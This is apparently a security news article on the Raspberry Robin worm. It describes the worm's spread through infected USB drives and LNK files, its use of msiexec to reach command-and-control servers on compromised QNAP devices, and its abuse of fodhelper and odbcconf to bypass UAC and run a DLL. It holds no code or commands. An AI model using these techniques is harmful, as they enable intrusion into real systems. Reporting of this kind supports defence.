Windows Installer Used by New Raspberry Robin Worm
The Worm Creates a New Process that Uses cmd.exe to Run Malicious Files.
Installing, maintaining, and uninstalling software is made easier using Windows Installer. Installation packages, which are loosely relational databases constructed as COM Structured Storages and frequently referred to as “MSI files” because of their default filename extensions, include the installation information as well as the files themselves, if applicable.
In comparison to its predecessor, Setup API, Windows Installer features considerable improvements. The addition of a graphical user interface framework as well as the automated development of the uninstallation sequence is among the new capabilities. Earlier versions of InstallShield and NSIS, as well as the newer Windows Installation, are positioned as alternatives to standalone executable installer frameworks.
A new Windows virus with worm capabilities has been found by Red Canary intelligence investigators. The malware spreads via the use of external USB sticks.
This virus is tied to a cluster of malicious behavior nicknamed Raspberry Robin, and it was first discovered in September 2021, according to the available information.
It was discovered in various client networks, some of which were in the technological and industrial industries. Red Canary’s Detection Engineering team was responsible for the discovery.
When a virus-infected USB device carrying a malicious.LNK file is attached to a new Windows PC, Raspberry Robin spreads to the new system.
As BleepingComputer reports, once connected, the worm creates a new process that uses cmd.exe to run a malicious file that has been saved on the infected computer’s hard disk.
Microsoft Standard Installer (msiexec.exe) is used to communicate with its command-and-control (C2) servers, which are most likely housed on hacked QNAP devices and which utilize TOR exit nodes as additional command-and-control (C2) infrastructure.
“Raspberry Robin” is Red Canary’s name for a cluster of activity we first observed in September 2021 involving a worm that is often installed via USB drive. This activity cluster relies on msiexec.exe to call out to its infrastructure, often compromised QNAP devices, using HTTP requests that contain a victim’s user and device names. We also observed Raspberry Robin use TOR exit nodes as additional command and control (C2) infrastructure.
Like most activity clusters we track, Raspberry Robin began as a handful of detections with similar characteristics that we saw in multiple customers’ environments, first noticed by Jason Killam from Red Canary’s Detection Engineering team. We saw Raspberry Robin activity as far back as September 2021, though most related activity occurred during or after January 2022. As we observed additional activity, we couldn’t find public reporting to corroborate our analysis, aside from some findings on VirusTotal that we suspected were related based on overlap in C2 domains.
This DLL is launched by Raspberry Robin with the assistance of two additional genuine Windows utilities: fodhelper (a trustworthy program for handling features in Windows settings) and odbcconf (a legitimate Windows database configuration utility) (a tool for configuring ODBC drivers).
Using the first method, it will be able to get through User Account Control (UAC), while the second will aid in the execution and configuration of the DLL.